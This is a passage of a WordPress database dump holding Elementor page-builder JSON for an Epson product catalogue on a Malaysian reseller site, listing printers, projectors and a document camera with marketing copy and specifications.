inks brings you ease of printing from your mobile devices over a wireless network so you can print low-cost, lab-quality photos at your convenience.<\\/p><ul><li>Yield of Up to 1,800 4R photos<\\/li><li>Lowest Printing Costs<\\/li><li>Wi-Fi &amp; Epson iPrint<\\/li><li>CD\\/DVD Printing Capability<\\/li><li>1 year or 3,000 prints warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"11bfc36\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"12\",\"right\":\"12\",\"bottom\":\"12\",\"left\":\"12\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"65279bf\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c65e6e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4af8eba\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"57b8f7e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Projectors for Work\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bbe338f\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"4e4173d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"1c6bf5d\",\"elType\":\"widget\",\"settings\":{\"title\":\"CORPORATE AND EDUCATION\\u00a0\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7e9242e\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"61d6693\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"bd3c8b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson EB-2055<\\/strong><\\/h4><p><img class=\\\"wp-image-2434 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-2055.png\\\" alt=\\\"\\\" width=\\\"245\\\" height=\\\"163\\\" \\/><\\/p><p>Leave the lights on and take control whether in the meeting room or classroom. Epson\\u2019s EB-2055 projector is engineered to shine outstandingly even in well-lit environments to enrich your presentation experience. Your brilliant presentations are made even better and more convenient with the new gesture-control function that allows you to navigate between your slides without the use of a peripheral device.<\\/p><ul><li>XGA Resolution<\\/li><li>White and Colour Light Output at 5,000 lumens<\\/li><li>Gesture Presenter<\\/li><li>Multi-PC Projection<\\/li><li>2 x HDMI<\\/li><li>Split Screen<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"646b12f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"12\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"43\",\"right\":\"43\",\"bottom\":\"43\",\"left\":\"43\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a9b5eee\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe4d6fd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson EB-2142W<\\/strong><\\/h4><br>\\n<img class=\\\"wp-image-2435 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-2142W.jpg\\\" alt=\\\"\\\" width=\\\"245\\\" height=\\\"138\\\" \\/>\\n\\nEnjoy success and unparalleled performance with Epson business projectors. Fully maximise your office space and experience a variety of connectivity options for your ultimate convenience. Along with long lamp-life and maintenance cycles, potential for saving costs and improving energy efficiency is now made possible for you. Every component is skillfully innovated with attention to detail in mind, including the integrated 3LCD technology that will provide you with stunning colour brightness for quality images.\\n<ul>\\n \\t<li>White and Colour Brightness at 4,200lm<\\/li>\\n \\t<li>WXGA Resolution<\\/li>\\n \\t<li>12000 hours lamp life in eco-mode<\\/li>\\n \\t<li>MHL-enabled<\\/li>\\n \\t<li>Multi-PC Projection<\\/li>\\n \\t<li>Horizontal Keystone Slider<\\/li>\\n \\t<li>Miracast<sup>\\u00ae<\\/sup><\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"24b65ae\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a26a32f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson EB-L500W\\u00a0<\\/strong><\\/h4>\\n<img class=\\\"wp-image-2436 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-L500W.jpg\\\" alt=\\\"\\\" width=\\\"251\\\" height=\\\"142\\\" \\/><br>\\n\\nThe compact, affordable EB-L500W laser projector delivers powerful performance for education and business applications. Get bright, vivid images with 5,000 lumens colour\\/white brightness. This wireless projector also offers WXGA resolution and Full HD support. Featuring breakthrough laser technology, it delivers a laser light source of up to 20,000 hours. And, it offers virtually maintenance-free operation for the life of the optical engine. Plus, it features a Dynamic contrast ratio of up to 2,500,000:1. It also includes wireless networking with enterprise-level security, and advanced installation features.\\n<ul>\\n \\t<li>5,000 lumens colour\\/white brightness<sup>\\u00a0<\\/sup><\\/li>\\n \\t<li>Colourful WXGA; up to 2,500,000:1 Dynamic contrast ratio<\\/li>\\n \\t<li>Laser light source of up to 20,000 hours<\\/li>\\n \\t<li>Virtually maintenance-free for optical engine life<\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cd625e2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8750887\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"16f2278\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c4ec64b\",\"elType\":\"widget\",\"settings\":{\"title\":\"ACCENT LIGHTING LASER PROJECTORS\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5f02a57\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"993393a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e46d09c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson LightScene EV-105<\\/strong><br \\/><br \\/><\\/h4><p><img class=\\\"wp-image-2437 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-LightScene-EV-105.jpg\\\" alt=\\\"\\\" width=\\\"263\\\" height=\\\"176\\\" \\/><\\/p><p>Create stunning visual displays and immersive environments with the LightScene EV-105, the cutting-edge digital signage solution from Epson. A convergence of lighting and display technology, LightScene laser projectors captivate audiences by simultaneously illuminating and projecting on virtually any surface or material, unleashing dynamic, experiential content for digital art, commercial signage and d\\u00e9cor applications. Designed to blend in discreetly to any setting \\u2014 from retail, hospitality and event spaces to showrooms and museums \\u2014 LightScene EV-105 offers a sleek, black spotlight design, with an array of configuration, mounting and programming options.<\\/p><ul><li>Laser projector for digital art and signage<\\/li><li>Seamlessly blends into virtually any environment<\\/li><li>Up to 20,000 hours of virtually maintenance-free operation<\\/li><li>360-degree mounting: floors, walls or ceilings<\\/li><li>Remote management and control tools<\\/li><li>Best New Award Overall<\\/li><\\/ul><div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b9132fb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"5a3decf\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"3a36c38\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7dad77c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b7207fe\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"466ac31\",\"elType\":\"widget\",\"settings\":{\"title\":\"ULTRA PORTABLE\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ccb5acc\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"45f89fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e7ec2bf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson EB-1785W\\u00a0<\\/strong><\\/h4>\\n<img class=\\\"wp-image-2438 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-1785W.png\\\" alt=\\\"\\\" width=\\\"238\\\" height=\\\"177\\\" \\/>\\n\\nThe Epson EB-1785W packs superior imaging quality along with a suite of connectivity and usability features into a body weighing only 1.83kg and 44mm slim. Wirelessly connect your smart devices to the projector via Wi-Fi, Miracast, iProjection application or NFC technology. The EB-1785W comes with Gesture Presenter technology, which allows you to transit between slides without a clicker. Lastly, with Epson\'s 3LCD technology that delivers up to 3 times wider colour gamut and brightness, you can astound audiences anywhere you go.\\n<ul>\\n \\t<li>White Light Output 3,200 lumens, Colour Light Output 3,200 lumens<\\/li>\\n \\t<li>WXGA Resolution<\\/li>\\n \\t<li>Real-Time Auto Keystone Correction<\\/li>\\n \\t<li>Split Screen Projection<\\/li>\\n \\t<li>Hassle-Free Presentation with USB 3-in-1 Display Feature and Epson iProjection<\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1914d98\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b5f42fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"e3f8c24\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d81ddc4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4f4cdf2\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"890a1d6\",\"elType\":\"widget\",\"settings\":{\"title\":\"INTERACTIVE\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c314a77\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"fbcb210\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1897c27\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson EB-536Wi\\u00a0<\\/strong><\\/h4><p><img class=\\\"wp-image-2439 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-536Wi.png\\\" alt=\\\"\\\" width=\\\"242\\\" height=\\\"136\\\" \\/><\\/p><p>Project large screen sizes even at close range and make your presentations larger-than-life with Epson EB-536Wi projector.<\\/p><ul><li>White and Colour Brightness at 3,400lm<\\/li><li>WXGA Resolution<\\/li><li>Multi-PC projection<\\/li><li>HDMI Connectivity<\\/li><li>Pen Interactivity<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"1dcee02\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"-5\",\"right\":\"-5\",\"bottom\":\"-5\",\"left\":\"-5\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a597712\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d315157\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson 595Wi\\/585Wi\\/575Wi<\\/strong>\\u00a0<img class=\\\"alignnone wp-image-2440\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-595Wi.png\\\" alt=\\\"\\\" width=\\\"276\\\" height=\\\"155\\\" \\/><\\/h4>\\nWith the finger-touch interactive function and PC-free annotation, you can easily transform any surface into an interactive environment so everyone can throw their ideas on the table.\\n<ul>\\n \\t<li>WXGA Resolution<\\/li>\\n \\t<li>White and Colour Brightness at 3,300lm<\\/li>\\n \\t<li>Multi-PC projection<\\/li>\\n \\t<li>HDMI Connectivity x2<\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"de8ca10\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"61ea7aa\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e5676d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"6efc9f3\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"281e34f\",\"elType\":\"widget\",\"settings\":{\"title\":\"HIGH BRIGHTNESS\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a49451\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"f301a8e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e7e2436\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson EB-L1405UNL\\u00a0<\\/strong><\\/h4><br>\\n<img class=\\\"wp-image-2441 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/EB-L1405UNL.png\\\" alt=\\\"\\\" width=\\\"207\\\" height=\\\"117\\\" \\/><br>\\n\\nThe Epson EB-L1405U projector is designed to deliver unyielding laser performance, from any position to most surfaces, up to 20,000\\u00a0long lasting hours maintenance-free.\\n<ul>\\n \\t<li>White and Colour Brightness at 8,000lm<\\/li>\\n \\t<li>WUXGA (1920 x 1200)<\\/li>\\n \\t<li>Edge-blending to create large panoramic images<\\/li>\\n \\t<li>Curve and corner wall projection<\\/li>\\n \\t<li>HDBaseT<\\/li>\\n<\\/ul>\\n<div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"dd3bc89\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6d9f7b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4><strong>Epson EB-G7400UNL\\u00a0<\\/strong><\\/h4><br>\\n<img class=\\\"wp-image-2442 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-G7400UNL.png\\\" alt=\\\"\\\" width=\\\"205\\\" height=\\\"116\\\" \\/><br>\\n\\nEpson high brightness EB-G7400U projector presents a new perspective on clarity, durability, and versatility. With the advanced C2Fine\\u2122 and 4K Enhancement Technology, projections are brought to life with vibrant colours in extreme resolution and vividness. Overcome the limitations of space constraints and project large and uncompromised images through the projector\\u2019s astoundingly short throw ratio of 0.35*.\\n\\n<em>* With optional ELPLX01 zero offset ultra-short throw lens.<\\/em>\\n<ul>\\n \\t<li>High Brightness<\\/li>\\n \\t<li>Beyond Full HD Resolution<\\/li>\\n \\t<li>Powered Lens<\\/li>\\n \\t<li>Portrait Projection<\\/li>\\n \\t<li>Flexible Installation<\\/li>\\n \\t<li>Edge Blending<\\/li>\\n \\t<li>Point Correction<\\/li>\\n<\\/ul>\\n<div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2860f60\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"abe0604\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson EB-Z10000U\\u00a0<\\/strong><\\/h4><br>\\n<img class=\\\"wp-image-2443 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-Z10000U.png\\\" alt=\\\"\\\" width=\\\"208\\\" height=\\\"117\\\" \\/><br>\\n\\nDiscover a powerful way to impress your audience the EB-Z10000U high brightness business projector gives you stunning, high-definition images with its 3LCD technology.\\n<ul>\\n \\t<li>White and Colour Brightness at 10,000\\u00a0lm<\\/li>\\n \\t<li>WUXGA resolution<\\/li>\\n \\t<li>High Reliability and Durability<\\/li>\\n \\t<li>Suitable for 24\\/7 usage<\\/li>\\n \\t<li>Flexible projection angles and installations<\\/li>\\n<\\/ul>\\n<div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6e2f23c\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"1be2016\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ccccf17\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>DOCUMENT CAMERAS<\\/h3><p><strong>Document Camera ELPDC21\\u00a0<\\/strong><img src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Document-Camera-ELPDC21.jpg\\\" alt=\\\"\\\" width=\\\"206\\\" height=\\\"137\\\" \\/><\\/p><p>Cut through the hassle, and get straight to your presentation. Epsons series of document cameras not only captures details with Full HD resolution, its versatile connectivity also gives you great functionality.<\\/p><ul><li>Pixels: 2MP (1920 x 1080 pixels)<\\/li><li>Camera Sensor: 1\\/2.7 inch CMOS Sensor<\\/li><li>Resolution: Up to Full HD (1080p)<\\/li><li>Zoom: 10x Digital Zoom, 12x Optical Zoom<\\/li><li>Weight: Approx 3.0kg<\\/li><\\/ul><p>[maxbutton id=\\\"12\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"d5e60a0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b6a1050\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(8089,3499,'_elementor_version','2.5.14'),(8656,3661,'_wc_apply_product',''),(8657,3661,'_yoast_wpseo_content_score','30'),(8092,3500,'_wp_page_template','template-fullwidth.php'),(8093,3500,'_elementor_edit_mode','builder'),(8094,3500,'_elementor_template_type','post'),(8095,3500,'_elementor_data','[{\"id\":\"0bcf275\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"829ac8b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2449815\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>As a global technology leader, Epson creates and delivers technology solutions for businesses and consumers, from inkjet printers and digital printing systems to 3LCD projectors, smart glasses, sensing systems and industrial robots. The company is focused on driving innovations and exceeding customer expectations in inkjet, visual communications, wearables and robotics.<\\/p><h2>Printers for Work<\\/h2><p>Epson has the best printers for your business requirements regardless documents, photos, receipts, large-formats, labels, or even apparels.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2698f52\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"93fa1d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f872ca9\",\"elType\":\"widget\",\"settings\":{\"title\":\"BUSINESS INKJET PRINTER\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2a74bb0\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"245ffff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"12a92f5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce Enterprise WF-C17590\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2417\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-Enterprise-WF-C17590.jpg\\\" alt=\\\"\\\" width=\\\"366\\\" height=\\\"207\\\" \\/><\\/p><p>Our massive investment in revolutionary technologies enables us to pay attention to every minute detail. PrecisionCore\\u2122, our next generation, high-density printhead, takes a great leap forward in enterprise printing. Epson WorkForce Enterprise WF-C17590 has arrived, giving you exactly what you need: superior quality, excellent connectivity and prints at lightning fast speed.<\\/p><ul><li>4-in-1 Network MFP: Print | Copy | Scan | Fax<\\/li><li>Ink: DURABrite<sup>TM<\\/sup>\\u00a0Pro pigment ink cartridges<\\/li><li>ISO Print Speed: 75 ISO ppm (black\\/colour) simplex\\/duplex<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"d99a531\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"51d6ae3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3a12efc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ffeb9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce Pro WF-C5290\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2418\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-Pro-WF-C5290.png\\\" alt=\\\"\\\" width=\\\"378\\\" height=\\\"213\\\" \\/><\\/p><p>Enjoy low-cost, reliable printing with Epson WorkForce Pro WF-C5290 business printer. Delivering fast print speeds of up to 24ipm with a first page-out time of just 4.8 seconds, it is built to handle the most demanding print jobs. With a range of printing and connectivity features, this printer is the ideal solution for small workgroups that require hassle-free, low-maintenance and productive-boosting printing.<\\/p><ul><li>High yield ink packs<\\/li><li>High-speed auto-duplex printing<\\/li><li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC<\\/li><li>Epson Connect<\\/li><li>Energy\\u00a0saving<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c9f78e3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"94b61d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b740aaa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce WF-100\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2419\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-WF-100.png\\\" alt=\\\"\\\" width=\\\"378\\\" height=\\\"213\\\" \\/><\\/p><p>Introducing the Epson WorkForce WF-100, a lightweight portable inkjet printer designed for professionals on the go. Battery-operated with integrated wireless capabilities such as Wi-Fi Direct and Epson Connect, you can have quality colour printouts anytime, anywhere.<\\/p><ul><li>Print speed up to 14 ppm<\\/li><li>Epson Connect<\\/li><li>1.44 Colour LCD Panel<\\/li><li>Wi-Fi and Wi-Fi Direct connectivity<\\/li><li>Built-in battery<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"96730a6\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":49,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"addc0f3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2b0e3f9\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"e754d94\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fc3866b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce WF-7711<\\/strong><\\/h4>\\n<img class=\\\"wp-image-2420 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-WF-7711.png\\\" alt=\\\"\\\" width=\\\"304\\\" height=\\\"172\\\" \\/><br>\\n\\nChange the way you print A3+ business documents with the Epson WorkForce WF-7711 printer. Designed for convenience, this smart printer is equipped with a suite of connectivity features, from USB and Ethernet to Wi-Fi Direct and NFC. With PrecisionCore<sup>TM<\\/sup>\\u00a0technology, fast printing speed consistently delivers success in every detail.\\n<ul>\\n \\t<li>Print speeds up to 18ipm for black and 10ipm for colour<\\/li>\\n \\t<li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC<\\/li>\\n \\t<li>Duplex printing up to A3 size<\\/li>\\n \\t<li>Epson DURABrite<sup>TM<\\/sup>\\u00a0Ultra ink<\\/li>\\n \\t<li>4.3\\u201d Colour LCD Touch Panel<\\/li>\\n \\t<li>Print, Scan, Copy Fax with ADF<\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5178d20\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b031280\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"b3a013d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f2b7b04\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c71ec36\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"732a1a6\",\"elType\":\"widget\",\"settings\":{\"title\":\"INK TANK SYSTEM\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e709cb3\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"60cd262\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97d2102\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson EcoTank L3150<\\/strong><\\/h4><p><img class=\\\"wp-image-2421 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EcoTank-L3150-.jpg\\\" alt=\\\"\\\" 